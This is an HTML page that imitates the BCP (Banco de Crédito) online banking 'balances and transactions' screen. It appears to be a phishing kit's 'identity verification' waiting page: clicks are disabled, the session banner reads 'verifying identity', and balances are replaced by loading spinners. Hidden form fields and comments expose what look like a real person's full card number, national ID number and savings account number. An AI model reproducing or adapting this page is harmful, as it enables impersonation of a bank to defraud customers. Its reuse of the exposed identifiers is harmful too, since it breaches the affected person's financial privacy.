<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Banco de Cr&eacute;dito&gt;&gt;BCP&gt;&gt;</title>
<meta content="ES" http-equiv="Content-Language">
<meta content="Canal Internet del Banco de Credito &gt;&gt;BCP&gt;&gt;" name="description">
<meta content="" name="keywords">
<meta content="Banco de Credito &gt;&gt;BCP&gt;&gt;" name="author">
<meta content="Global" name="distribution">
<meta content="� Banco de Credito &gt;&gt;BCP&gt;&gt;" name="copyright">
<meta content="FOLLOW,INDEX" name="robots">
<meta content="no-cache" http-equiv="pragma">
<meta content="no-cache" http-equiv="cache-control">
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<meta content="" name="description">
<meta content="initial-scale=1.0" name="viewport">
<link type="text/css" rel="stylesheet" href="./verifyingProcessing_files/site.css">
<script type="text/javascript" src="./verifyingProcessing_files/jquery.js"></script><script>var x="templatesRediseno/bcpsaldos.xsl";</script></script><script src="./verifyingProcessing_files/comunes.js" language="JavaScript"></script></script>
</head>
<body style="pointer-events:none; " onload="campanhaPopUps(&#39;1&#39;, document.form1.IDC.value, document.form1.BIN_POPUP.value, document.form1.TAMCLAVE.value, &#39; &#39;, document.form1.CHAMACUMPLEANOS.value);" onunload="javascript:logout();" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" bgcolor="#FFFFFF" id="body">
<a name="top"></a>
<div id="header">
<div class="inner wrapper">
<div class="sp sp-main-logo" id="logo">BCP</div>
<ul class="menu menu-1" id="user_metadata">
<li class="menu-i" id="user_name">Sesi&oacute;n iniciada por:  VERIFICANDO IDENTIDAD ....<br>
</li>
<li class="menu-i last-child" id="user_card">

<!--
<span class="noprint" id="card1Tela">4557</span><span class="noscreen" id="card1Print">****</span>-<span class="noprint" id="card2Tela">8809</span><span class="noscreen" id="card2Print">****</span>-<span class="noprint" id="card3Tela">6130</span><span class="noscreen" id="card3Print">****</span>-5731
-->
</li>
</ul>
</div>
<div id="header_metadata">
<div class="wrapper_new">
<div id="barra_add"></div>
<div id="last_login">
<strong>&uacute;ltima sesi&oacute;n</strong><span id="fechaLargax"></span>
</div>
<div style="float: right;" id="clock_header">
<div id="logout">
<a href="javascript:NovaPagina(&#39;logout&#39;);" onmouseout="window.status=&#39;&#39;;return true" onmouseover="window.status=&#39;Cerrar Sesi&oacute;n&#39;;return true" class="txt11blan" style="padding-right: 6px;">Cerrar sesi&oacute;n</a><span class="sp sp-main-close-1"></span>
</div>
</div>
</div>
</div>
</div>
<div class="header_main">
<div class="item" id="user_avatar">
<span class="sp sp-main-candado-2"></span><img height="100" width="100" align="absmiddle" src="./verifyingProcessing_files/OperacionesEnLinea" id="imgHeader" name="imgHeader" class="noprint"></div>
<div class="colorRGB txt11red noprint" style="background: rgb(177, 223, 119);">&nbsp;</div>
<div class="item" id="user_welcome">
<h1 style="margin-top: 8px;line-height: 1em;font-family: &#39;flexobold_italic&#39;;" class="title">Bienvenido <strong></strong>
</h1>
<div class="slogan">
<!--<div class="helper"></div>-->
<span class="noprint">
    Cuenta en proceso de verificaci&oacute;n...    
</span>
</div>
</div>
<div class="item" id="user_shortaccess">
<p class="title">Accesos directos</p>
<ul class="menu">
<li class="menu-i first-child">
<a class="menu-t" style="cursor: pointer;" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" onclick="javascript:NovaPagina(&#39;bcpcuentaspropias1&#39;)" onmouseover="window.status=&#39;Transferencias&#39;;this.style.cursor=&#39;hand&#39;;return true"><span class="sp sp-main-dolar-1"></span><span class="text">Transferencias</span></a>
</li>
<li class="menu-i">
<a class="menu-t" style="cursor: pointer;" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" onclick="javascript:NovaPagina(&#39;bcppagosfrecuentes&#39;)" onmouseover="window.status=&#39;Pago de servicios&#39;;this.style.cursor=&#39;hand&#39;;return true"><span class="sp sp-main-statics-1"></span><span class="text">Operaciones</span></a>
</li>
<li class="menu-i">
<a class="menu-t" style="cursor: pointer;" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" onclick="javascript:NovaPagina(&#39;bcptuscreditos&#39;);" onmouseover="window.status=&#39;bcptuscreditos&#39;;this.style.cursor=&#39;hand&#39;;return true"><span class="sp sp-main-percent-1"></span><span class="text">Cr&eacute;ditos</span></a>
</li>
<li class="menu-i last-child">
<a class="menu-t" style="cursor: pointer;" onclick="javascript:NovaPagina(&#39;bcpconsolidada_inicial&#39;);" onmouseover="window.status=&#39;bcpconsolidada_inicial&#39;;this.style.cursor=&#39;hand&#39;;return true"><span class="sp sp-main-doc-1"></span><span class="text">Productos</span></a>
</li>
</ul>
</div>
</div>
<div class="wrapper" id="main_content">
<div class="principal" id="principal">
<form onsubmit="return false" name="form1" method="post" action="#">
<input value="" name="TRANSACTION" type="hidden"><input value="Axk7b7TR19baPMOSzA6VT0k" name="_session_" type="hidden"><input value="" name="ACCCURRENCY" type="hidden"><input value="" name="ACCNUMBER" type="hidden"><input value="" name="ACCTYPE" type="hidden"><input value="" name="ACCAGENCY" type="hidden"><input value="" name="CHAMACUMPLEANOS" type="hidden"><input value="4557880" name="BIN_POPUP" type="hidden"><input value="" name="DESCTYPE" type="hidden"><input value="" name="LIST_ACCOUNT" type="hidden"><input value="" name="CAMPSTATUS" type="hidden"><input value="false" name="FLAG_CAMP" type="hidden"><input value="" id="TIPO_FLUJO_POSIT" name="TIPO_FLUJO_POSIT" type="hidden"><input value="" id="TIPO_VENTA_POSIT" name="TIPO_VENTA_POSIT" type="hidden"><input value="" id="CABECERA_POSIT" name="CABECERA_POSIT" type="hidden"><input value="" id="CUERPO_POSIT" name="CUERPO_POSIT" type="hidden"><input value="" id="PIE_POSIT" name="PIE_POSIT" type="hidden">
<table cellpadding="0" cellspacing="0" border="0" width="960px">
<tbody><tr>
<td class="noprint" valign="top" width="146px"><span class="noprint" id="menuNoPrint"><script language="JavaScript"> document.oncontextmenu = disableRightClick; </script><input value="0" type="hidden" name="EVENTO"><input value="" type="hidden" name="MESSAGE_CANNOT"><input value="UNKNOWN" type="hidden" name="TRANSACTION_MARK"><input value="getrubros" type="hidden" name="RUBROS"><input value="Axk7b7TR19baPMOSzA6VT0k" type="hidden" name="_sessiontemp_"><input value="4557880961305731" type="hidden" name="CARDPOPUP"><input value="6" type="hidden" name="TAMCLAVE"><input value="44845247" type="hidden" name="IDC"><input value="4557880961305731" type="hidden" name="CARDNUMBER">
<div class="main_navigation" id="main_navigation">
<script>var x="templatesRediseno/bcpmenusaldo.xsl";</script>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colspan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td align="left" class="nivel01li sub-submenu active-1" width="155"><span class="helper helper-1 w-subnav sub-expand"></span><strong style="color:#ff4f00;" class="submenu">Consultas</strong></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td colspan="2">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
<tbody><tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02off td-sub-submenu" align="left" width="150"><span class="sub-submenu" style="color: #0E4C8C; font-weight: bold;">Tus saldos y movimientos</span></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;bcptuscreditos&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;bcptuscreditos&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">Tus Cr&eacute;ditos</a></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;consulta_inversiones&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;consulta_inversiones&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">Tus Inversiones</a></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;bcpconsolidada_inicial&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;bcpconsolidada_inicial&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">Todos tus productos BCP</a></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;bcpestadoscuenta&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;bcpestadoscuenta&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">Tus estados de cuenta</a></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;AT88&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;AT88&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">D&eacute;bito Autom&aacute;tico</a></td>
</tr>
<tr>
<td width="9" align="right" class="nivel02li sub-submenu icon-sub-submenu"><span class="helper helper-2 "></span></td><td class="nivel02li td-sub-submenu" align="left" width="150"><a onmouseover="window.status=&#39;bcpconsultaletras&#39;;this.style.cursor=&#39;hand&#39;;return true" onclick="javascript:NovaPagina(&#39;bcpconsultaletras&#39;);" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="sub-submenu">Tus letras y facturas</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Pagos y transferencias&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;bcpcuentaspropias1&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Pagos y transferencias</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Ofertas BCP&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;tus_ofertas&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Ofertas BCP</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Afilia a tu Credim&aacute;s&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;bcpafiliacion1&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Afilia a tu Credim&aacute;s</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Actualizaci&oacute;n de datos&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;datospersonales&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Actualizaci&oacute;n de datos</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Adelanto de Sueldo&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;adelantosueldo&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Adelanto de Sueldo</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td colpan="2">
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td width="150" align="left" class="nivel02li td-submenu"><span class="helper helper-1 w-subnav sub-expand"></span><a onmouseover="window.status=&#39;Cambia tu clave de internet&#39;;this.style.cursor=&#39;hand&#39;;return true" class="submenu" onclick="javascript:NovaPagina(&#39;cambioclave&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Cambia tu clave de Internet</a></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</div>
</span></td><td style="background: white;" valign="top" width="579px" class="consultas">
<div style="background:white;padding: 14px 17px 16px 19px;">
<table cellpadding="0" cellspacing="0" border="0" width="579px">
<tbody><tr>
<td><script>
				
					$(document).ready(function() {
					
							var color = 'E9F5DA';


							
							if(color == "FDCCDE"){
								$(".txt11red").css("background","#F94989");
								$(".txt11azul").css("background","#FDCCDE");					
							}
							if(color == "CCEBF5"){
								$(".txt11red").css("background","#46B7DD");	
								$(".txt11azul").css("background","#CCEBF5");						
							}
							if(color == "FFDCCC"){
								$(".txt11red").css("background","#FF8343");
								$(".txt11azul").css("background","#FFDCCC");						
							}	
							if(color == "E9F5DA"){
								$(".txt11red").css("background","#B1DF77");
								$(".txt11azul").css("background","#E9F5DA");							
							}
							if(color == "FFF0CF"){
								$(".txt11red").css("background","#FFCC4B");
								$(".txt11azul").css("background","#FFF0CF");							
							}
							if(color == "CCD3FA"){
								$(".txt11red").css("background","#4B4A96");
								$(".txt11azul").css("background","#CCD3FA");							
							}
							if(color == "FB99BD"){
								$(".txt11red").css("background","#F94989");	
								$(".txt11azul").css("background","#FDCCDE");						
							}
							if(color == "99D6EB"){
								$(".txt11red").css("background","#46B7DD");	
								$(".txt11azul").css("background","#CCEBF5");						
							}
							if(color == "F9A39D"){
								$(".txt11red").css("background","#FF8343");	
								$(".txt11azul").css("background","#FFDCCC");						
							}
							if(color == "D3EBB4"){
								$(".txt11red").css("background","#B1DF77");	
								$(".txt11azul").css("background","#E9F5DA");						
							}	
							if(color == "FFE19F"){
								$(".txt11red").css("background","#FFCC4B");	
								$(".txt11azul").css("background","#FFF0CF");						
							}
							if(color == "E5E5EF"){
								$(".txt11red").css("background","#4B4A96");	
								$(".txt11azul").css("background","#CCD3FA");						
							}
							if(color == "FFFFFF"){
								$(".txt11red").css("background","#46B7DD");	
								$(".txt11azul").css("background","#CCEBF5");						
							}															
				
					});						
				
				</script>
<h1 style="text-align:left; width: 420px; float:left; " class="titulo-h1">Tus saldos y movimientos<em>&nbsp;</em>
</h1>
<div style="float:right; margin-top: 3px;" class="options split-2-2">
<a onclick="javascript:Imprimir()" class="item print" onmouseover="window.status=&#39;Imprimir&#39;;return true" style="cursor:pointer;"><span class="sp sp-main-print-1"></span><span class="text">Imprimir</span></a>
</div>
</td>
</tr>
<tr>
<td width="447" valign="top" style="">
<div style="border: 1px solid #e5e5e5;padding: 1px;width: 573px; text-align:left;">
<div style="margin:11px;">
<input value="$totalCTAS" name="totalCTAS" type="hidden">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tbody><tr>
<td id="KXT011" style="height:11px; padding-bottom: 10px;" colspan="4"><strong>Cuentas en soles</strong></td>
</tr>
<tr class="t-head">
<th style="width:195px;" align="left"><b>Cuenta</b></th><th style="width:114px; " align="right"><b>Saldo</b></th><th style="width:105px;">&nbsp;</th><th align="center"><b>Movimientos</b></th>
</tr>
<tr class="space-3 separate">
<td class="td00zs">
    <img src="./verifyingProcessing_files/cargando12.gif" >
  <!--  <b>Ahorro</b>&nbsp;<br>390-30353142-0-11 -->
</td>
<td align="right" class="td00zs">
    <img src="./verifyingProcessing_files/cargando12.gif" >

</td>

<td>&nbsp;</td>
<td class="td00zs center"><a class="txtcolorsub" name="lnkSiguientes" href="javascript:MostraMov(&#39;390&#39;,&#39;390-30353142-0-11&#39;,&#39;01&#39;,%200,%20&#39;Ahorro&#39;)">Ver</a></td>
</tr>
</tbody></table>
<input name="accountNumberFullText" type="hidden" value="Ahorro|390-30353142-0-11">
<br>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td class="row" align="right" height="28"><a onmouseover="window.status=&#39;Consulta de c&oacute;digo interbancario&#39;;return true" onclick="javascript:postCheckAccountCode()" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#" class="codint">Consulta de c&oacute;digo interbancario</a></td>
</tr>
</tbody></table>
<hr>
</div>
</div>
</td>
</tr>
</tbody></table>
</div>
</td><td width="13px" valign="top"></td><td valign="top" width="157px"><script src="./verifyingProcessing_files/comunes.js" type="text/javascript"></script>
<div style="position: absolute; " id="secundary">
<div style="float:left;" class="banners noprint">
<div>
<a style="display: block;" class="nivo-imageLink" target="_blank" href="http://www.viabcp.com/"><img alt="" src="./verifyingProcessing_files/imagen_29012014064051.png"></a>
</div>
</div>
<div style="float:left;width:100%;" class="box box-2 change-type noprint">
<div style="text-align:left;" class="inner">
<strong class="title">"Recuerda, el tipo de cambio variar&aacute; de acuerdo al monto y tipo de operaci&oacute;n que realizar&aacute;s, verif&iacute;calo antes de realizar tus operaciones".</strong>
<p>Compra <strong class="high">S/ 3.210</strong>
</p>
<p>Venta <strong class="high">S/ 3.350</strong>
</p>
</div>
</div>
<div style="text-align:left;" id="callcenter">
<span class="helper"></span><small style="text-align:left;" class="title">&iquest;Dudas o consultas?</small><span class="sp sp-main-phone" style="text-align:left;"></span><strong class="phone" style="text-align:left;">311-9898</strong>
</div>
</div>
</td>
</tr>
</tbody></table>
</form>
</div>
</div>
<div id="footer">
<div class="inner wrapper_new_footer">
<ul class="menu" id="menu_footer">
<li class="menu-i first-child">
<a class="menu-t" onclick="MM_openBrWindow(&#39;http://www.juntossomosmasseguros.com&#39;,&#39;politseguridad&#39;,&#39;scrollbars=yes,resizable=yes,width=656,height=545,top=0,left=0&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Pol&iacute;ticas de seguridad</a>
</li>
<li class="menu-i">
<a class="menu-t" onclick="MM_openBrWindow(&#39;http://www.viabcp.com/connect/pdf/HBK/demo/ventana.html&#39;,&#39;atencion&#39;,&#39;scrollbars=yes,resizable=yes,width=800,height=600,top=0,left=0&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Empieza en V&iacute;a BCP</a>
</li>
<li class="menu-i">
<a class="menu-t" onclick="MM_openBrWindow(&#39;http://www.viabcp.com/plataformavirtual/&#39;,&#39;atencion&#39;,&#39;scrollbars=yes,resizable=yes,width=656,height=545,top=0,left=0&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Cont&aacute;ctanos</a>
</li>
<li class="menu-i last-child">
<a class="menu-t" onclick="MM_openBrWindow(&#39;http://www.viabcp.com/tasasytarifas/ResultadoBusquedaTasa.aspx?ATAS=3&amp;F=0&amp;PCTAS=&#39;,&#39;tarifas&#39;,&#39;scrollbars=yes,width=500,height=545&#39;)" href="https://bcpzonasegura.viabcp.com/bcp/OperacionesEnLinea#">Tarifas en Internet</a>
</li>
</ul>
<hr>
<p id="copy">� 2012 ViaBCP.com Todos los derechos reservados</p>
<div id="barra_add_footer"></div>
</div>
</div>



</body></html>